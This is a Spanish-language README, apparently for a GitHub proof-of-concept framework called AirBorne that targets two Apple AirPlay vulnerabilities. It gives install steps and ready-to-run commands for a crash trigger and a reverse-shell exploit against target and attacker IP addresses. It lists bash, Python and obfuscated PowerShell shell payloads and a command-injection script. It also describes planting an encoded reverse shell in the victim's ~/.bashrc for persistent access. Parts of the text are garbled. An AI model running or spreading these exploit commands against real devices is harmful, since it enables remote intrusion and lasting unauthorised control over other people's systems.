
PoC para CVE-2025-24252 y CVE-2025-24132
Framework PoC completo para CVE-2025-24252 y CVE-2025-24132
Por ekomsSavior |
AirBorne es un framework combinado de prueba de concepto (PoC) que apunta a dos vulnerabilidades graves en el servicio AirPlay de Apple. Incluye un desencadenador de caída completo y un exploit de shell inversa funcional con persistencia opcional, listener y múltiples formatos de payload, todo en un solo script.
¿Buscas la versión original?
La edición heredada sigue disponible en la ramalegacyde este repositorio.
Para revisarla:
git checkout legacy
.bashrc (Linux).git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
El único script airborne.py incluye ambos PoCs y toda la lógica:
--exploit--payload--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
Requiere una interfaz en modo monitor.
Iniciar el exploit completo con shell bash predeterminada:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
Elegir shell de Python en su lugar:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Habilitar persistencia real en objetivos Linux:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
Solo inyección de comandos de shell
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Descripción |
|---|---|
bash | Shell inversa bash predeterminada sobre TCP |
python | Shell inversa basada en Python usando socket y pty |
Al usar --persistent, el script añadirá el payload de shell inversa codificado al archivo del objetivo:
~/.bashrc
Esto garantiza que recibirás una shell cada vez que el usuario inicie sesión o se abra una terminal.
base64 y se entregan tras el desbordamiento de búferEste proyecto está destinado únicamente a investigación educativa, ética y autorizada.
La explotación no autorizada de sistemas es ilegal y poco ética.
powershell |
| Payload RCE completo de Windows PowerShell (ofuscado) |